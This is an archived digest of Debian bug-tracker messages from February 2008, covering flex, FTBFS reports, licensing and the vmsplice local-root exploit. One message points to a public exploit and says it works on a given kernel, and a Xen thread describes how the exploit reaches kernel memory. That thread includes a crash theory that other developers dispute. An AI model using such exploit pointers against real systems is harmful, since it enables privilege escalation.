+   error = -EFAULT;
+   break;
+   }
+
/*
 * Get this base offset and number of pages, then map
 * in the user pages.


signature.asc
Description: Digital signature


Bug#464659: flex: Reports errors when parsing comments

2008-02-10 Thread Sergei Golovan
On 2/9/08, Manoj Srivastava [EMAIL PROTECTED] wrote:
 Hi,

 I think I can reproduce this. Unfortunately, I am on my way out
  of town, and I have not been able to  find the source of the bug. I
  shall be back next week, and I'll try and get to the bottom of this
  then.

I've found a bug in bison parser (parser.y). Fixng it makes the bug
gone. I'm attaching it. The diff is huge since it includes rebuilt
scan.c which was incorrectly generated using buggy parser.

(If it's OK, I could NMU the package as flex is in build-dependencies
of very many packages and this bug is likely to make many of them
FTBFS.)

-- 
Sergei Golovan


464659.diff.gz
Description: GNU Zip compressed data


Processed (with 5 errors): Re: Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

2008-02-10 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 tags 464945 patch
Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for 
linux-image-2.18-5-686 (CVE-2008-0009/10)
Tags were: security
Bug#464953: linux-2.6: mmap() local root exploit
Tags added: patch

 On Sun, Feb 10, 2008 at 03:19:20AM +0300, Okulov Vitaliy wrote:
Unknown command or malformed arguments to command.

  Just try explot from http://www.milw0rm.com/exploits/5092 at my
Unknown command or malformed arguments to command.

  linux-image-2.6.18-5-686 kernel. And it works. Please backport patch
Unknown command or malformed arguments to command.

  from 2.6.24.1 kernel (CVE-2008-0009/10).
Unknown command or malformed arguments to command.

 Preliminary patch, it includes more checks then the update in 2.6.24.1.
Unknown command or malformed arguments to command.

Too many unknown commands, stopping here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465052: FTBFS: flex failure

2008-02-10 Thread Julien Cristau
On Sun, Feb 10, 2008 at 12:49:51 +0100, Christian Perrier wrote:

 Package: slashem
 Version: 0.0.7E7F3-1
 Severity: serious
 
 While trying to rebuild your package with pbuilder, to fix the incorrect 
 encoding of
 debian/changelog, I went on the following:
 
 (if you fix this, please also fix the debian/changelog encoding
 issues...even if you NMU the package)
 
This is probably #464659 in flex.

Cheers,
Julien



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465053: python-semanage: empty package on several architectures

2008-02-10 Thread Niko Tyni
Package: python-semanage
Version: 2.0.9-1
Severity: grave
Justification: renders package unusable

The python-semanage package is empty on at least i386, sparc, and
powerpc. From a build log:

make[1]: Entering directory `/build/buildd/libsemanage-2.0.9/src'
swig -Wall -python -o semanageswig_wrap.c -outdir ./ semanageswig_python.i
make[1]: swig: Command not found
make[1]: *** [semanageswig_wrap.c] Error 127
make[1]: Leaving directory `/build/buildd/libsemanage-2.0.9/src'
chmod: cannot access 
`/build/buildd/libsemanage-2.0.9/debian/python-semanage/usr/lib/python-support/python-semanage/python2.4/site-packages/*':
 No such file or directory
mv: cannot stat 
`/build/buildd/libsemanage-2.0.9/debian/python-semanage/usr/lib/python-support/python-semanage/python2.4/site-packages/*.py':
 No such file or directory
mv: cannot stat 
`/build/buildd/libsemanage-2.0.9/debian/python-semanage/usr/lib/python-support/python-semanage/python2.4/site-packages/*':
 No such file or directory
make[1]: Entering directory `/build/buildd/libsemanage-2.0.9/src'
swig -Wall -python -o semanageswig_wrap.c -outdir ./ semanageswig_python.i
make[1]: swig: Command not found
make[1]: *** [semanageswig_wrap.c] Error 127
make[1]: Leaving directory `/build/buildd/libsemanage-2.0.9/src'

Please make the 'for version in $(ALL_PY_VERSIONS)' loop in
debian/local.mk fail on errors instead of carrying on and producing an
empty package.

Cheers,
-- 
Niko Tyni   [EMAIL PROTECTED]



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: severity of 465056 is serious

2008-02-10 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.13
 severity 465056 serious
Bug#465056: grub-pc violates the GPL
Severity set to `serious' from `critical'


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465055: php-ps: FTBFS: libgd2-dev not available anymore.

2008-02-10 Thread Kurt Roeckx
Package: php-ps
Version: 1.3.6-2
Severity: serious

Hi,

You have a build dependency on:
libgd2-dev ( 2.0.0) | libgd2-xpm-dev ( 2.0.0) | libgd2-noxpm-dev ( 2.0.0)

The buildd's will only consider the first of those, and then fail.
You'll want to remove that part.


Kurt




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464969: [Pkg-xen-devel] Bug#464969: xen-hypervisor-3.2-1-i386: Linux mmap()/vmsplice() exploit causes memory map corruption in hypervisor regardless of domain privilege

2008-02-10 Thread Bastian Blank
tags 464969 moreinfo
thanks

On Sat, Feb 09, 2008 at 11:37:00PM -0600, William Pitcock wrote:
 When running the exploit listed in bug 464953 [1], Xen's memory state
 becomes corrupted and the hypervisor eventually crashes, taking all of
 the domU's with it. As such, this breaks operational behaviour, so I have
 marked this as critical.

You have to show evidence that the Hypervisor crashed if the exploit
runs in a domU. dom0 is special and can always crash the hypervisor. A
stacktrace is usable to do this.

Bastian

-- 
I'm a soldier, not a diplomat.  I can only tell the truth.
-- Kirk, Errand of Mercy, stardate 3198.9



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465056: grub-pc violates the GPL

2008-02-10 Thread Adrian Bunk
Package: grub-pc
Version: 1.96+20080209-1
Severity: critical

grub-pc is licenced under the GPLv3+ [1].

LZO 2.02 is licenced under the GPLv2 only.

This makes the current Debian package of grub-pc illegal.

Note:
Markus Oberhumer told me that the next LZO version 2.03
will be available under the GPLv2+.


[1] GPLv3+ = GPL version 3 or any later version



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: Re: [Pkg-xen-devel] Bug#464969: xen-hypervisor-3.2-1-i386: Linux mmap()/vmsplice() exploit causes memory map corruption in hypervisor regardless of domain privilege

2008-02-10 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 tags 464969 moreinfo
Bug#464969: xen-hypervisor-3.2-1-i386: Linux mmap()/vmsplice() exploit causes 
memory map corruption in hypervisor regardless of domain privilege
Tags were: security
Tags added: moreinfo

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464969: [Pkg-xen-devel] Bug#464969: xen-hypervisor-3.2-1-i386: Linux mmap()/vmsplice() exploit causes memory map corruption in hypervisor regardless of domain privilege

2008-02-10 Thread William Pitcock
Hi,

On Sun, 2008-02-10 at 13:32 +0100, Bastian Blank wrote:
 You have to show evidence that the Hypervisor crashed if the exploit
 runs in a domU. dom0 is special and can always crash the hypervisor. A
 stacktrace is usable to do this.

I'm sorry but I cannot provide evidence because it would involve
crashing a production machine. Users of said machine are already annoyed
that it crashed the first time.

However, running the exploit does indeed cause the hypervisor to crash;
here's why:

The exploit works by altering the memory map (via vmsplice()) to get
access into kernel space. Since the memory map is altered in the domU,
it is no longer in sync with the global state. Each domU is aware of the
state of the other domU's in Xen (at least, this is what the
documentation tells me, and this would explain why you can't for example
mix NON-PAE and PAE kernels on x86). If one domU gets out of sync, it
could cause state corruption in the hypervisor.

As a result, Xen should check for this state corruption by maintaining a
secondary copy of the memory map and ensuring that it has not been
altered. If it has been altered, it should _probably_ kill the VM which
did it.

William


signature.asc
Description: This is a digitally signed message part


Bug#437295: marked as done (iiimecf: conflicts with iiimf-client-el)

2008-02-10 Thread Debian Bug Tracking System
Your message dated Sun, 10 Feb 2008 22:01:37 +0900 (JST)
with message-id [EMAIL PROTECTED]
and subject line Closing bugs of iiimecf
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---
Package: iiimecf
Version: 0.6-7
Severity: serious

iiimecf seems to be an old version of iiimf-client-el and conflicts
with it.

Please add `Conflicts: iiimf-client-el' to the dependency of iiimecf,
or remove iiimecf from the archives if unneeded.

Thanks,
--
Tatsuya Kinoshita


pgpv2oQZiXypN.pgp
Description: PGP signature
---End Message---
---BeginMessage---
The iiimecf pacakge was removed from testing/unstable/experimental.
Closing the bugs.

Thanks,
--
Tatsuya Kinoshita


pgpGGA1ikqV6A.pgp
Description: PGP signature
---End Message---


Bug#465028: libqt3-mt: Missing weak symbols for stat64 functions

2008-02-10 Thread Sune Vuorela
On Sunday 10 February 2008, Guillem Jover wrote:
 Package: libqt3-mt
 Version: 3:3.3.8b-1
 Severity: serious

 Hi,

 The Qt shared libraries were providing weak symbols for stat64,
 lstat64 and fstat64 until version 3:3.3.7-9, but not anymore, other
 Qt/KDE apps depend on those symbols, so they get terminated when the
 symbols cannot be resolved during runtime (as the linking is done
 lazyly). Affected applications I've seen terminate during runtime or
 just when starting: gwenview and k3b.

urgh.

I wonder what caused this.  Rebuilding 3:3.3.7-9 in a current sid environment 
also don't have these symbols.

3.3.7 from the archive:
 objdump -T /usr/lib/libqt-mt.so | grep stat64
  DF *UND*  003f  GLIBC_2.2   __fxstat64
  DF *UND*  003f  GLIBC_2.2   __lxstat64
  DF *UND*  003f  GLIBC_2.2   __xstat64
00616a72  w   DF .text  0032  Baselstat64
00326a32  w   DF .text  0032  Basefstat64
0050abac  w   DF .text  0032  Basestat64


3.3.8 from the archive:
$ objdump -T libqt-mt.so.3 | grep stat64
  DF *UND*  003f  GLIBC_2.2   __fxstat64
  DF *UND*  003f  GLIBC_2.2   __lxstat64
  DF *UND*  003f  GLIBC_2.2   __xstat64

locally built 3.3.7:
$ objdump -T libqt-mt.so.3 | grep stat64
  DF *UND*  003f  GLIBC_2.2   __fxstat64
  DF *UND*  003f  GLIBC_2.2   __lxstat64
  DF *UND*  003f  GLIBC_2.2   __xstat64

I wonder what happpened.
Any advice appreciated.

/Sune
-- 
Man, how might I remove a utility to a Fast TCP/IP forward from the control 
file within LinuxPPC 6000?

First of all from Internet Explorer 99 you either should never ping to a 
computer of the hard disk to the Internet site, or cannot boot from a mouse 
in order to link the memory.


signature.asc
Description: This is a digitally signed message part.


Bug#439235: marked as done (cmail: startup modifies load-path directly)

2008-02-10 Thread Debian Bug Tracking System
Your message dated Sun, 10 Feb 2008 22:05:05 +0900 (JST)
with message-id [EMAIL PROTECTED]
and subject line Closing bugs of cmail
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---
Package: cmail
Version: 2.62-5
Severity: serious

cmail package's emacsen-startup file modifies the load-path
variable directly.  According to debian-emacs-policy, please use
the debian-pkg-add-load-path-item function instead of setq.

Thanks,
--
Tatsuya Kinoshita


pgpJWYMxEJmKO.pgp
Description: PGP signature
---End Message---
---BeginMessage---
The cmail pacakge was removed from testing/unstable.
Closing the bugs.

Thanks,
--
Tatsuya Kinoshita


pgpMjQFMtgBCr.pgp
Description: PGP signature
---End Message---


Bug#464792: Upgrading to latest php packages has stopped phpldapadmin working

2008-02-10 Thread Fabio Tranchitella
Hello,

* 2008-02-10 14:19, Jamie Thompson wrote:
 I just installed phpldapadmin 1.1.0.5-1, and get the same problem. I
 looked in my vhost logs and saw no errors, but on a hunch I looked in the
 main logs, and found this being logged for every request:
 
 [notice] child pid pid exit signal Segmentation fault (11)

Did you upgrade php5-ldap? That's the only non-standard extension that
phpldapadmin uses.

Cheers,

-- 
Fabio Tranchitella http://www.kobold.it
Free Software Developer and Consultant http://www.tranchitella.it
_
1024D/7F961564, fpr 5465 6E69 E559 6466 BF3D 9F01 2BF8 EE2B 7F96 1564



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464792: Upgrading to latest php packages has stopped phpldapadmin working

2008-02-10 Thread Jamie Thompson

Fabio Tranchitella wrote:


Can you please try the package in unstable (1.1.0.5-1)?
It should fix your problem.


I just installed phpldapadmin 1.1.0.5-1, and get the same problem. I looked in my vhost logs and saw no errors, but on a hunch I looked in the main 
logs, and found this being logged for every request:


[notice] child pid pid exit signal Segmentation fault (11)

...which would probably explain the badness. Doesn't tell me which process 
though...



signature.asc
Description: OpenPGP digital signature


Bug#465061: bsdcpio: option parsing is broken on several architectures

2008-02-10 Thread Niko Tyni
Package: bsdcpio
Version: 2.4.11-1
Severity: grave
Justification: renders package unusable

The option parsing of bsdcpio is totally broken on arm, armel, s390 and
powerpc due to a wrong assumption on char signedness. From cpio/cpio.c:

 char opt;
 [...]
 while ((opt = cpio_getopt(cpio)) != -1) {
 [...]

This yields a compiler warning, as seen in eg. the arm build log:

 cpio/cpio.c: In function 'main':
 cpio/cpio.c:114: warning: comparison is always true due to limited range of 
data type

The result is that any bsdcpio invocation fails with the usage
instructions. I have verified this on an arm Etch installation with a
backported package, but there's little doubt that it's the case also
for the current sid packages.

See eg. http://lists.debian.org/debian-devel/2001/12/msg02074.html
for a discussion on the char signedness issue.

Cheers,
-- 
Niko Tyni   [EMAIL PROTECTED]



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#439234: marked as done (cmail: FTBFS: emacs: Command not found with xemacs21)

2008-02-10 Thread Debian Bug Tracking System
Your message dated Sun, 10 Feb 2008 22:05:05 +0900 (JST)
with message-id [EMAIL PROTECTED]
and subject line Closing bugs of cmail
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---
Package: cmail
Version: 2.62-5
Severity: serious

cmail's Build-Depends-Indep is

  emacs21|xemacs21-mule-canna-wnn|xemacs21-mule

However, when xemacs21-mule is installed and emacs21 is not
installed, cmail fails to build from the source, because the source
uses the `emacs' command which is not provided by xemacs21-mule.


[...]
 debian/rules build
dh_testdir
# Add here commands to compile the package.
[ ! -f debian/patched ]  patch bbdb-cmail.el debian/bbdb-cmail.diff  touch 
debian/patched
patching file bbdb-cmail.el
/usr/bin/make
make[1]: Entering directory `/tmp/buildd/cmail-2.62'
emacs -batch -q -no-site-file -l CMAIL-MK -f compile-cmail \
NONE NONE NONE NONE
make[1]: emacs: Command not found
make[1]: *** [elc] Error 127
make[1]: Leaving directory `/tmp/buildd/cmail-2.62'
make: *** [build-stamp] Error 2


To fix this bug, please use `emacs' or `emacs | emacs22 | emacs21'
in Build-Depends-Indep.

Thanks,
--
Tatsuya Kinoshita


pgpJaoCrmzsJa.pgp
Description: PGP signature
---End Message---
---BeginMessage---
The cmail pacakge was removed from testing/unstable.
Closing the bugs.

Thanks,
--
Tatsuya Kinoshita


pgpJAbbA7Fcd7.pgp
Description: PGP signature
---End Message---


Bug#464969: [Pkg-xen-devel] Bug#464969: xen-hypervisor-3.2-1-i386: Linux mmap()/vmsplice() exploit causes memory map corruption in hypervisor regardless of domain privilege

2008-02-10 Thread Bastian Blank
On Sun, Feb 10, 2008 at 06:56:59AM -0600, William Pitcock wrote:
 I'm sorry but I cannot provide evidence because it would involve
 crashing a production machine. Users of said machine are already annoyed
 that it crashed the first time.

Okay. Where did you run the exploit the first time?

 The exploit works by altering the memory map (via vmsplice()) to get
 access into kernel space. Since the memory map is altered in the domU,
 it is no longer in sync with the global state. Each domU is aware of the
 state of the other domU's in Xen (at least, this is what the
 documentation tells me, and this would explain why you can't for example
 mix NON-PAE and PAE kernels on x86). If one domU gets out of sync, it
 could cause state corruption in the hypervisor.

No, this is not correct. The physical-to-machine translation is public
readable. This table is not writable by the domains. The exploit changes
only the Linux page table.

On a x86_64 machine, it just raises a GPF.

Bastian

-- 
Vulcans believe peace should not depend on force.
-- Amanda, Journey to Babel, stardate 3842.3



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464969: [Pkg-xen-devel] Bug#464969: xen-hypervisor-3.2-1-i386: Linux mmap()/vmsplice() exploit causes memory map corruption in hypervisor regardless of domain privilege

2008-02-10 Thread Samuel Thibault
William Pitcock, le Sun 10 Feb 2008 06:56:59 -0600, a écrit :
 On Sun, 2008-02-10 at 13:32 +0100, Bastian Blank wrote:
  You have to show evidence that the Hypervisor crashed if the exploit
  runs in a domU. dom0 is special and can always crash the hypervisor. A
  stacktrace is usable to do this.
 
 However, running the exploit does indeed cause the hypervisor to crash;

Again, that's no wonder for a dom0, but the question is what about
domU.

 The exploit works by altering the memory map (via vmsplice()) to get
 access into kernel space.

Yes, and in such case Xen will refuse to make the memory map change and
just crash the guest.

 Since the memory map is altered in the domU, it is no longer in sync
 with the global state.

What do you call global state?

 Each domU is aware of the state of the other domU's

?! domUs don't know each other.

 in Xen (at least, this is what the documentation tells me,

What part of the documentation brings you to that?

 ). If one domU gets out of sync, it could cause state corruption in
 the hypervisor.

There's no reason why a domU should be in charge of keeping in sync. In
the security model of Xen, domU is _not_ trusted.

 As a result, Xen should check for this state corruption by maintaining
 a secondary copy of the memory map and ensuring that it has not been
 altered. If it has been altered, it should _probably_ kill the VM
 which did it.

It already traps and checks _all_ updates of the memory maps and kills
the VM if appropriate (but lets dom0 do whatever it wants).

Samuel



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465066: gappletviewer-4.3: empty package on arm* and mips*

2008-02-10 Thread Niko Tyni
Package: gappletviewer-4.3
Version: 4.3-20080202-1
Severity: grave
Justification: renders package unusable

The gappletviewer-4.3 package is empty on those architectures
that aren't configured 'with_java_plugin': armel arm m68k mips mipsel.

These empty packages are useless; please build the package only for the
supported architectures and have the others removed from the archive.

(This applies to -4.2 as well, I'll clone the bug later.)

Cheers,
-- 
Niko Tyni   [EMAIL PROTECTED]



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464734: topshelf: Does Not Start

2008-02-10 Thread Siegfried-Angel
Oops, I mean Python 2.5.

2008/2/10, David Nusinow [EMAIL PROTECTED]:
 On Fri, Feb 08, 2008 at 10:08:06PM +0100, Siegfried-Angel wrote:
  I forwarded this upstream: https://bugs.launchpad.net/topshelf/+bug/190295.
 
  Could you please check if it works with Python 2.4?

 As you can see from the version of python that reportbug attached to my bug
 report, I was using python 2.4. Interestingly, this program works on one of
 my systems but not the other. I don't have any idea why this would be.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464734: topshelf: Does Not Start

2008-02-10 Thread David Nusinow
On Fri, Feb 08, 2008 at 10:08:06PM +0100, Siegfried-Angel wrote:
 I forwarded this upstream: https://bugs.launchpad.net/topshelf/+bug/190295.
 
 Could you please check if it works with Python 2.4?

As you can see from the version of python that reportbug attached to my bug
report, I was using python 2.4. Interestingly, this program works on one of
my systems but not the other. I don't have any idea why this would be.

 - David Nusinow



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464849: marked as done (erlang_1:12.b.1-dfsg-1(m68k/unstable):)

2008-02-10 Thread Debian Bug Tracking System
Your message dated Sun, 10 Feb 2008 13:47:04 +
with message-id [EMAIL PROTECTED]
and subject line Bug#464659: fixed in flex 2.5.34-2.1
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---
Package: erlang
Version: 1:12.b.1-dfsg-1
Severity: serious

There was an error while trying to autobuild your package:

 Automatic build of erlang_1:12.b.1-dfsg-1 on crest by sbuild/m68k 85
 Build started at 20080208-0643

[...]

 ** Using build dependencies supplied by package:
 Build-Depends: autoconf (= 2.50), autotools-dev, bison, debhelper (= 
 5.0.0), flex, libgd2-xpm-dev, libncurses5-dev, libsctp-dev [!hurd-i386 
 !kfreebsd-i386 !kfreebsd-amd64], libssl-dev, m4, openssl, perl, quilt, 
 unixodbc-dev

[...]

 megaco_flex_scanner_drv.flex:35: bad character: /
 make[6]: *** [megaco_flex_scanner_drv.c] Error 1
 make[6]: Leaving directory 
 `/build/buildd/erlang-12.b.1-dfsg/lib/megaco/src/flex'
 make[5]: *** [opt] Error 2
 make[5]: Leaving directory 
 `/build/buildd/erlang-12.b.1-dfsg/lib/megaco/src/flex'
 make[4]: *** [opt] Error 2
 make[4]: Leaving directory `/build/buildd/erlang-12.b.1-dfsg/lib/megaco/src'
 make[3]: *** [opt] Error 2
 make[3]: Leaving directory `/build/buildd/erlang-12.b.1-dfsg/lib/megaco'
 make[2]: *** [opt] Error 2
 make[2]: Leaving directory `/build/buildd/erlang-12.b.1-dfsg/lib'
 make[1]: *** [libs] Error 2
 make[1]: Leaving directory `/build/buildd/erlang-12.b.1-dfsg'
 make: *** [build-stnd-stamp] Error 2
 dpkg-buildpackage: failure: debian/rules build gave error exit status 2

A full build log can be found at:
http://buildd.debian.org/build.php?arch=m68kpkg=erlangver=1:12.b.1-dfsg-1
 


---End Message---
---BeginMessage---
Source: flex
Source-Version: 2.5.34-2.1

We believe that the bug you reported is fixed in the latest version of
flex, which is due to be installed in the Debian FTP archive:

flex-doc_2.5.34-2.1_all.deb
  to pool/main/f/flex/flex-doc_2.5.34-2.1_all.deb
flex_2.5.34-2.1.diff.gz
  to pool/main/f/flex/flex_2.5.34-2.1.diff.gz
flex_2.5.34-2.1.dsc
  to pool/main/f/flex/flex_2.5.34-2.1.dsc
flex_2.5.34-2.1_i386.deb
  to pool/main/f/flex/flex_2.5.34-2.1_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Sergei Golovan [EMAIL PROTECTED] (supplier of updated flex package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Sun, 10 Feb 2008 13:47:32 +0300
Source: flex
Binary: flex flex-doc
Architecture: source all i386
Version: 2.5.34-2.1
Distribution: unstable
Urgency: low
Maintainer: Manoj Srivastava [EMAIL PROTECTED]
Changed-By: Sergei Golovan [EMAIL PROTECTED]
Description: 
 flex   - A fast lexical analyzer generator.
 flex-doc   - Documentation for flex (a fast lexical analyzer generator).
Closes: 464659
Changes: 
 flex (2.5.34-2.1) unstable; urgency=low
 .
   * Non-maintainer upload.
   * Fixed a bug in parser with incorrectly added character to a ccl
 (closes: #464659).
Files: 
 a280cc9933923726cb3965849f89728b 767 devel standard flex_2.5.34-2.1.dsc
 dd7ebe13da40efd867240daa44839bb5 61094 devel standard flex_2.5.34-2.1.diff.gz
 719a33a2aec852eb588fab8064d87fd0 197970 doc optional 
flex-doc_2.5.34-2.1_all.deb
 f2bccb7604f5d427db557712cc9145c2 303614 devel standard flex_2.5.34-2.1_i386.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHrv0BIcdH02pGEFIRAqqIAJ9sCV9/zD9HEoTc3pYYF5Fhxn+veQCfayI9
lrbiuPBKw0h+zgutrHmVkeA=
=hrn1
-END PGP SIGNATURE-


---End Message---


Processed: closing 361560

2008-02-10 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.15
 close 361560 2.1.99-20080209-1
Bug#361560: FTBFS with GCC 4.2: llvm's xgcc: Internal error: Illegal instruction
'close' is deprecated; see http://www.debian.org/Bugs/Developer#closing.
Bug marked as fixed in version 2.1.99-20080209-1, send any further explanations 
to Martin Michlmayr [EMAIL PROTECTED]


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465061: marked as forwarded (bsdcpio: option parsing is broken on several architectures)

2008-02-10 Thread Debian Bug Tracking System
Your message dated Sun, 10 Feb 2008 08:49:57 -0600
with message-id [EMAIL PROTECTED]
has caused the Debian Bug report #465061,
regarding bsdcpio: option parsing is broken on several architectures
to be marked as having been forwarded to the upstream software
author(s) [EMAIL PROTECTED]

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---
Hi,

I got this bug from a Debian developer regarding an assumption about the 
signedness of char:
---BeginMessage---
Package: bsdcpio
Version: 2.4.11-1
Severity: grave
Justification: renders package unusable

The option parsing of bsdcpio is totally broken on arm, armel, s390 and
powerpc due to a wrong assumption on char signedness. From cpio/cpio.c:

 char opt;
 [...]
 while ((opt = cpio_getopt(cpio)) != -1) {
 [...]

This yields a compiler warning, as seen in eg. the arm build log:

 cpio/cpio.c: In function 'main':
 cpio/cpio.c:114: warning: comparison is always true due to limited range of 
data type

The result is that any bsdcpio invocation fails with the usage
instructions. I have verified this on an arm Etch installation with a
backported package, but there's little doubt that it's the case also
for the current sid packages.

See eg. http://lists.debian.org/debian-devel/2001/12/msg02074.html
for a discussion on the char signedness issue.

Cheers,
-- 
Niko Tyni   [EMAIL PROTECTED]



---End Message---
---End Message---


Bug#465035: libcomplearn-mod-ppmdx: FTBFS on 64 bit arches.

2008-02-10 Thread Rudi Cilibrasi
Hi Kurt,

Thanks for the interest.  The reason I have restricted 64-bit
architectures is because the maintainer of ppmd told me that ppmd does
not work on 64-bit architectures.  The packages build, but I am told
they do not work.  Was I misinformed?  (have you gotten any to work on
64-bit?)

best regards, -Rudi



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#463305: kde4: Core Apps Crash Rendering Package Unusable)

2008-02-10 Thread David Baron
Here is some more, possibly useful information:

Postings on kubuntu's lists complained of problems with dbus without root 
permissions. Kubuntu/ubuntu's approach to this is sudo only so becomes more 
problematic. On my Debian system:

1. Dbusd IS running, started on init. (Note: There is no udev rule and no /dev 
entry for dbus.)
2. However, two instances of dbus-launcher become stuck in memory when 
attempting to start kde4 as user, one by user and one by root!
3. Hal's udev rule calls for a certain socket. There is no such file on my 
system. The URI is NOT a /dev path.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464384: elinks_0.12~20080127-1(experimental/amd64/xenophanes): -Werror, warning: cast from pointer to integer of different size

2008-02-10 Thread Y Giridhar Appaji Nag
On 08/02/10 11:37 +0200, Kalle Olavi Niemitalo said ...
 Thank you.  I pushed the following patch, which should fix these.
 
 commit 61019c31304f89141248b0381974d1e3886cf160

Thank you KON.  I pushed changes based on these to alioth git.  The
builds should go through fine now I suppose.  I had them tested atleast
on amd64 and powerpc.  I'll request an upload.

Giridhar

-- 
Y Giridhar Appaji Nag | http://www.appaji.net/


signature.asc
Description: Digital signature


Bug#465052: FTBFS: flex failure

2008-02-10 Thread Christian Perrier
Quoting Julien Cristau ([EMAIL PROTECTED]):
 On Sun, Feb 10, 2008 at 12:49:51 +0100, Christian Perrier wrote:
 
  Package: slashem
  Version: 0.0.7E7F3-1
  Severity: serious
  
  While trying to rebuild your package with pbuilder, to fix the incorrect 
  encoding of
  debian/changelog, I went on the following:
  
  (if you fix this, please also fix the debian/changelog encoding
  issues...even if you NMU the package)
  
 This is probably #464659 in flex.

Agreed. I'll try rebuilding slashem when flex NMU will have reached
unstable.

If the problem is fixed, I'll close the BR.



signature.asc
Description: Digital signature


Bug#464734: topshelf: Does Not Start

2008-02-10 Thread David Nusinow
On Sun, Feb 10, 2008 at 03:15:52PM +0100, Siegfried-Angel wrote:
 Oops, I mean Python 2.5.

Ok, I'll try it at work little later (where topshelf is broken), but
topshelf works fine on my home system which does not have 2.5 installed.

 - David Nusinow



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
